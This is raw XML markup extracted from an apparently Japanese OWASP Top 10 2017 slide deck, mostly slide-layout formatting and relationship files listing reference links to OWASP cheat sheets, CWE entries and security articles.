                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ビジネス面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a: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100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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7" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="8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0" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34632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100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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3"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z="800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4A1647"/>
                </a:solidFill>
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A1647"/>
              </a:solidFill>
              <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Gruppieren 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-37281" y="1026000"/>
            <a:ext cx="6133281" cy="388800"/>
            <a:chOff x="-37281" y="1045614"/>
            <a:chExt cx="6133281" cy="388800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-37281" y="1045614"/>
              <a:ext cx="6133281" cy="388800"/>
              <a:chOff x="-37281" y="1056343"/>
              <a:chExt cx="6133281"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defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ja-JP" alt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影響</a:t>
                </a:r>
                <a:endParaRPr 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700" b="1" dirty="0">
                    <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                    <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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700" b="1" dirty="0">
                    <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                    <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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700" b="1" dirty="0">
                    <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                    <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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700" b="1" dirty="0">
                    <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                    <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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700" b="1" dirty="0">
                    <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                    <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-37281" y="1113447"/>
                <a:ext cx="577075" cy="297058"/>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ja-JP" alt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脅威</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="ja-JP"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a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ja-JP" altLang="en-US" sz="6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エージェント</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="5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ja-JP" alt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攻撃手法</a:t>
                </a:r>
                <a:endParaRPr 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r" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="ja-JP" alt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セキュリティ上の</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="ja-JP"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a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="ja-JP" alt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userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1052825"/>
              <a:ext cx="220306" cy="381589"/>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700" b="1" dirty="0">
                <a:latin typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2883600" y="1197048"/>
              <a:ext cx="92320" cy="9528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Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Meiryo" panose="020B0604030504040204" pitchFamily="34" charset="-128"/>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OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html"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blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html"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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.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cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html"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en.wikipedia.org/wiki/Document_type_definition" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.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s://cwe.mitre.org/data/definitions/639.html"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285.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.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4.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.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77.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bountie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OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html"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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.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s://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.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s://cwe.mitre.org/data/definitions/77.html"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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.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portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><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cwe.mitre.org/data/definitions/79.htm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hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><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github.com/mbechler/marshalsec" TargetMode="Externa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502.html"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s://cwe.mitre.org/data/definitions/77.html"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www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><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github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.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www.cvedetails.com/version-search.php"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s://rubysec.com/"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_V1_Architecture" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries"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csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><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we.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.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www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project"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Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project"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Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter"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WebGoat" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education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Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project"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OWASP_Node_js_Goat_Project"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xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><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slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="Externa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9.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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodolog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2.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2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall"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xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.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notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.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slide" Target="slide19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues"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owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Cheatsheets" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xm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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls"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hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="Externa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12.xml"/><Relationship Id="rId5" 